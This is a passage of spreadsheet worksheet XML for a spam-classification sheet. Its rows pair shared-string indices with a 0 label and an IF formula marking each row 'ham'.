        <v>0</v>
      </c>
      <c r="C4655" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4656" t="s">
        <v>4006</v>
      </c>
      <c r="B4656">
        <v>0</v>
      </c>
      <c r="C4656" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4657" t="s">
        <v>4007</v>
      </c>
      <c r="B4657">
        <v>0</v>
      </c>
      <c r="C4657" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4658" t="s">
        <v>4008</v>
      </c>
      <c r="B4658">
        <v>0</v>
      </c>
      <c r="C4658" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4659" t="s">
        <v>4009</v>
      </c>
      <c r="B4659">
        <v>0</v>
      </c>
      <c r="C4659" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4660" t="s">
        <v>4010</v>
      </c>
      <c r="B4660">
        <v>0</v>
      </c>
      <c r="C4660" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4661" t="s">
        <v>4011</v>
      </c>
      <c r="B4661">
        <v>0</v>
      </c>
      <c r="C4661" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4662" t="s">
        <v>4012</v>
      </c>
      <c r="B4662">
        <v>0</v>
      </c>
      <c r="C4662" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4663" t="s">
        <v>4013</v>
      </c>
      <c r="B4663">
        <v>0</v>
      </c>
      <c r="C4663" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4664" t="s">
        <v>4014</v>
      </c>
      <c r="B4664">
        <v>0</v>
      </c>
      <c r="C4664" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4665" t="s">
        <v>4015</v>
      </c>
      <c r="B4665">
        <v>0</v>
      </c>
      <c r="C4665" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4666" t="s">
        <v>4016</v>
      </c>
      <c r="B4666">
        <v>0</v>
      </c>
      <c r="C4666" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4667" t="s">
        <v>4017</v>
      </c>
      <c r="B4667">
        <v>0</v>
      </c>
      <c r="C4667" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4668" t="s">
        <v>4018</v>
      </c>
      <c r="B4668">
        <v>0</v>
      </c>
      <c r="C4668" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4669" t="s">
        <v>4019</v>
      </c>
      <c r="B4669">
        <v>0</v>
      </c>
      <c r="C4669" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4670" t="s">
        <v>4020</v>
      </c>
      <c r="B4670">
        <v>0</v>
      </c>
      <c r="C4670" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4671" t="s">
        <v>4021</v>
      </c>
      <c r="B4671">
        <v>0</v>
      </c>
      <c r="C4671" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4672" t="s">
        <v>4022</v>
      </c>
      <c r="B4672">
        <v>0</v>
      </c>
      <c r="C4672" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4673" t="s">
        <v>4023</v>
      </c>
      <c r="B4673">
        <v>0</v>
      </c>
      <c r="C4673" t="str">
        <f t="shared" si="72"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4674" t="s">
        <v>4024</v>
      </c>
      <c r="B4674">
        <v>0</v>
      </c>
      <c r="C4674" t="str">
        <f t="shared" ref="C4674:C4737" si="73">IF(B4674="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4675" t="s">
        <v>4025</v>
      </c>
      <c r="B4675">
        <v>0</v>
      </c>
      <c r="C4675" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4676" t="s">
        <v>4026</v>
      </c>
      <c r="B4676">
        <v>0</v>
      </c>
      <c r="C4676" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4677" t="s">
        <v>4027</v>
      </c>
      <c r="B4677">
        <v>0</v>
      </c>
      <c r="C4677" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4678" t="s">
        <v>4028</v>
      </c>
      <c r="B4678">
        <v>0</v>
      </c>
      <c r="C4678" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4679" t="s">
        <v>4029</v>
      </c>
      <c r="B4679">
        <v>0</v>
      </c>
      <c r="C4679" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4680" t="s">
        <v>4030</v>
      </c>
      <c r="B4680">
        <v>0</v>
      </c>
      <c r="C4680" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4681" t="s">
        <v>4031</v>
      </c>
      <c r="B4681">
        <v>0</v>
      </c>
      <c r="C4681" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4682" t="s">
        <v>4032</v>
      </c>
      <c r="B4682">
        <v>0</v>
      </c>
      <c r="C4682" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4683" t="s">
        <v>4033</v>
      </c>
      <c r="B4683">
        <v>0</v>
      </c>
      <c r="C4683" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4684" t="s">
        <v>4034</v>
      </c>
      <c r="B4684">
        <v>0</v>
      </c>
      <c r="C4684" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4685" t="s">
        <v>4035</v>
      </c>
      <c r="B4685">
        <v>0</v>
      </c>
      <c r="C4685" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4686" t="s">
        <v>4036</v>
      </c>
      <c r="B4686">
        <v>0</v>
      </c>
      <c r="C4686" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4687" t="s">
        <v>4037</v>
      </c>
      <c r="B4687">
        <v>0</v>
      </c>
      <c r="C4687" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4688" t="s">
        <v>4038</v>
      </c>
      <c r="B4688">
        <v>0</v>
      </c>
      <c r="C4688" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4689" t="s">
        <v>4039</v>
      </c>
      <c r="B4689">
        <v>0</v>
      </c>
      <c r="C4689" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4690" t="s">
        <v>4040</v>
      </c>
      <c r="B4690">
        <v>0</v>
      </c>
      <c r="C4690" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4691" t="s">
        <v>4041</v>
      </c>
      <c r="B4691">
        <v>0</v>
      </c>
      <c r="C4691" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4692" t="s">
        <v>4042</v>
      </c>
      <c r="B4692">
        <v>0</v>
      </c>
      <c r="C4692" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4693" t="s">
        <v>4043</v>
      </c>
      <c r="B4693">
        <v>0</v>
      </c>
      <c r="C4693" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4694" t="s">
        <v>4044</v>
      </c>
      <c r="B4694">
        <v>0</v>
      </c>
      <c r="C4694" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4695" t="s">
        <v>4045</v>
      </c>
      <c r="B4695">
        <v>0</v>
      </c>
      <c r="C4695" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4696" t="s">
        <v>4046</v>
      </c>
      <c r="B4696">
        <v>0</v>
      </c>
      <c r="C4696" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4697" t="s">
        <v>4047</v>
      </c>
      <c r="B4697">
        <v>0</v>
      </c>
      <c r="C4697" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4698" t="s">
        <v>4048</v>
      </c>
      <c r="B4698">
        <v>0</v>
      </c>
      <c r="C4698" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4699" t="s">
        <v>4049</v>
      </c>
      <c r="B4699">
        <v>0</v>
      </c>
      <c r="C4699" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4700" t="s">
        <v>4050</v>
      </c>
      <c r="B4700">
        <v>0</v>
      </c>
      <c r="C4700" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4701" t="s">
        <v>4051</v>
      </c>
      <c r="B4701">
        <v>0</v>
      </c>
      <c r="C4701" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4702" t="s">
        <v>4052</v>
      </c>
      <c r="B4702">
        <v>0</v>
      </c>
      <c r="C4702" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4703" t="s">
        <v>4053</v>
      </c>
      <c r="B4703">
        <v>0</v>
      </c>
      <c r="C4703" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4704" t="s">
        <v>4054</v>
      </c>
      <c r="B4704">
        <v>0</v>
      </c>
      <c r="C4704" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4705" t="s">
        <v>4055</v>
      </c>
      <c r="B4705">
        <v>0</v>
      </c>
      <c r="C4705" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4706" t="s">
        <v>4056</v>
      </c>
      <c r="B4706">
        <v>0</v>
      </c>
      <c r="C4706" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4707" t="s">
        <v>4057</v>
      </c>
      <c r="B4707">
        <v>0</v>
      </c>
      <c r="C4707" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4708" t="s">
        <v>4058</v>
      </c>
      <c r="B4708">
        <v>0</v>
      </c>
      <c r="C4708" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4709" t="s">
        <v>4059</v>
      </c>
      <c r="B4709">
        <v>0</v>
      </c>
      <c r="C4709" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4710" t="s">
        <v>4060</v>
      </c>
      <c r="B4710">
        <v>0</v>
      </c>
      <c r="C4710" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4711" t="s">
        <v>4061</v>
      </c>
      <c r="B4711">
        <v>0</v>
      </c>
      <c r="C4711" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4712" t="s">
        <v>4062</v>
      </c>
      <c r="B4712">
        <v>0</v>
      </c>
      <c r="C4712" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4713" t="s">
        <v>4063</v>
      </c>
      <c r="B4713">
        <v>0</v>
      </c>
      <c r="C4713" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4714" t="s">
        <v>4064</v>
      </c>
      <c r="B4714">
        <v>0</v>
      </c>
      <c r="C4714" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4715" t="s">
        <v>4065</v>
      </c>
      <c r="B4715">
        <v>0</v>
      </c>
      <c r="C4715" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4716" t="s">
        <v>4066</v>
      </c>
      <c r="B4716">
        <v>0</v>
      </c>
      <c r="C4716" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4717" t="s">
        <v>4067</v>
      </c>
      <c r="B4717">
        <v>0</v>
      </c>
      <c r="C4717" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4718" t="s">
        <v>4068</v>
      </c>
      <c r="B4718">
        <v>0</v>
      </c>
      <c r="C4718" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4719" t="s">
        <v>4069</v>
      </c>
      <c r="B4719">
        <v>0</v>
      </c>
      <c r="C4719" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4720" t="s">
        <v>4070</v>
      </c>
      <c r="B4720">
        <v>0</v>
      </c>
      <c r="C4720" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4721" t="s">
        <v>4071</v>
      </c>
      <c r="B4721">
        <v>0</v>
      </c>
      <c r="C4721" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4722" t="s">
        <v>4072</v>
      </c>
      <c r="B4722">
        <v>0</v>
      </c>
      <c r="C4722" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4723" t="s">
        <v>4073</v>
      </c>
      <c r="B4723">
        <v>0</v>
      </c>
      <c r="C4723" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4724" t="s">
        <v>4074</v>
      </c>
      <c r="B4724">
        <v>0</v>
      </c>
      <c r="C4724" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4725" t="s">
        <v>4075</v>
      </c>
      <c r="B4725">
        <v>0</v>
      </c>
      <c r="C4725" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4726" t="s">
        <v>4076</v>
      </c>
      <c r="B4726">
        <v>0</v>
      </c>
      <c r="C4726" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4727" t="s">
        <v>4077</v>
      </c>
      <c r="B4727">
        <v>0</v>
      </c>
      <c r="C4727" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4728" t="s">
        <v>4078</v>
      </c>
      <c r="B4728">
        <v>0</v>
      </c>
      <c r="C4728" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4729" t="s">
        <v>4079</v>
      </c>
      <c r="B4729">
        <v>0</v>
      </c>
      <c r="C4729" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4730" t="s">
        <v>4080</v>
      </c>
      <c r="B4730">
        <v>0</v>
      </c>
      <c r="C4730" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4731" t="s">
        <v>4081</v>
      </c>
      <c r="B4731">
        <v>0</v>
      </c>
      <c r="C4731" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4732" t="s">
        <v>4082</v>
      </c>
      <c r="B4732">
        <v>0</v>
      </c>
      <c r="C4732" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4733" t="s">
        <v>4083</v>
      </c>
      <c r="B4733">
        <v>0</v>
      </c>
      <c r="C4733" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4734" t="s">
        <v>4084</v>
      </c>
      <c r="B4734">
        <v>0</v>
      </c>
      <c r="C4734" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4735" t="s">
        <v>4085</v>
      </c>
      <c r="B4735">
        <v>0</v>
      </c>
      <c r="C4735" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4736" t="s">
        <v>4086</v>
      </c>
      <c r="B4736">
        <v>0</v>
      </c>
      <c r="C4736" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4737" t="s">
        <v>4087</v>
      </c>
      <c r="B4737">
        <v>0</v>
      </c>
      <c r="C4737" t="str">
        <f t="shared" si="73"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4738" t="s">
        <v>4088</v>
      </c>
      <c r="B4738">
        <v>0</v>
      </c>
      <c r="C4738" t="str">
        <f t="shared" ref="C4738:C4801" si="74">IF(B4738="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4739" t="s">
        <v>4089</v>
      </c>
      <c r="B4739">
        <v>0</v>
      </c>
      <c r="C4739" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4740" t="s">
        <v>4090</v>
      </c>
      <c r="B4740">
        <v>0</v>
      </c>
      <c r="C4740" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4741" t="s">
        <v>4091</v>
      </c>
      <c r="B4741">
        <v>0</v>
      </c>
      <c r="C4741" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4742" t="s">
        <v>4092</v>
      </c>
      <c r="B4742">
        <v>0</v>
      </c>
      <c r="C4742" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4743" t="s">
        <v>4093</v>
      </c>
      <c r="B4743">
        <v>0</v>
      </c>
      <c r="C4743" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4744" t="s">
        <v>4094</v>
      </c>
      <c r="B4744">
        <v>0</v>
      </c>
      <c r="C4744" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4745" t="s">
        <v>4095</v>
      </c>
      <c r="B4745">
        <v>0</v>
      </c>
      <c r="C4745" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4746" t="s">
        <v>4096</v>
      </c>
      <c r="B4746">
        <v>0</v>
      </c>
      <c r="C4746" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4747" t="s">
        <v>4097</v>
      </c>
      <c r="B4747">
        <v>0</v>
      </c>
      <c r="C4747" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4748" t="s">
        <v>4098</v>
      </c>
      <c r="B4748">
        <v>0</v>
      </c>
      <c r="C4748" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4749" t="s">
        <v>4099</v>
      </c>
      <c r="B4749">
        <v>0</v>
      </c>
      <c r="C4749" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4750" t="s">
        <v>4100</v>
      </c>
      <c r="B4750">
        <v>0</v>
      </c>
      <c r="C4750" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4751" t="s">
        <v>4101</v>
      </c>
      <c r="B4751">
        <v>0</v>
      </c>
      <c r="C4751" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4752" t="s">
        <v>4102</v>
      </c>
      <c r="B4752">
        <v>0</v>
      </c>
      <c r="C4752" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4753" t="s">
        <v>4103</v>
      </c>
      <c r="B4753">
        <v>0</v>
      </c>
      <c r="C4753" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4754" t="s">
        <v>4104</v>
      </c>
      <c r="B4754">
        <v>0</v>
      </c>
      <c r="C4754" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4755" t="s">
        <v>4105</v>
      </c>
      <c r="B4755">
        <v>0</v>
      </c>
      <c r="C4755" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4756" t="s">
        <v>4106</v>
      </c>
      <c r="B4756">
        <v>0</v>
      </c>
      <c r="C4756" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4757" t="s">
        <v>4107</v>
      </c>
      <c r="B4757">
        <v>0</v>
      </c>
      <c r="C4757" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4758" t="s">
        <v>4108</v>
      </c>
      <c r="B4758">
        <v>0</v>
      </c>
      <c r="C4758" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4759" t="s">
        <v>4109</v>
      </c>
      <c r="B4759">
        <v>0</v>
      </c>
      <c r="C4759" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4760" t="s">
        <v>4110</v>
      </c>
      <c r="B4760">
        <v>0</v>
      </c>
      <c r="C4760" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4761" t="s">
        <v>4111</v>
      </c>
      <c r="B4761">
        <v>0</v>
      </c>
      <c r="C4761" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4762" t="s">
        <v>4112</v>
      </c>
      <c r="B4762">
        <v>0</v>
      </c>
      <c r="C4762" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4763" t="s">
        <v>4113</v>
      </c>
      <c r="B4763">
        <v>0</v>
      </c>
      <c r="C4763" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4764" t="s">
        <v>4114</v>
      </c>
      <c r="B4764">
        <v>0</v>
      </c>
      <c r="C4764" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4765" t="s">
        <v>4115</v>
      </c>
      <c r="B4765">
        <v>0</v>
      </c>
      <c r="C4765" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4766" t="s">
        <v>4116</v>
      </c>
      <c r="B4766">
        <v>0</v>
      </c>
      <c r="C4766" t="str">
        <f t="shared" si="74"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4767" t="s">
        <v>4117</v>
      </c>
      <c r="B4767">
        <v>0</v>
      </c>
      <c r="C4767" t="str">
        <f t="shared" si="74"/>
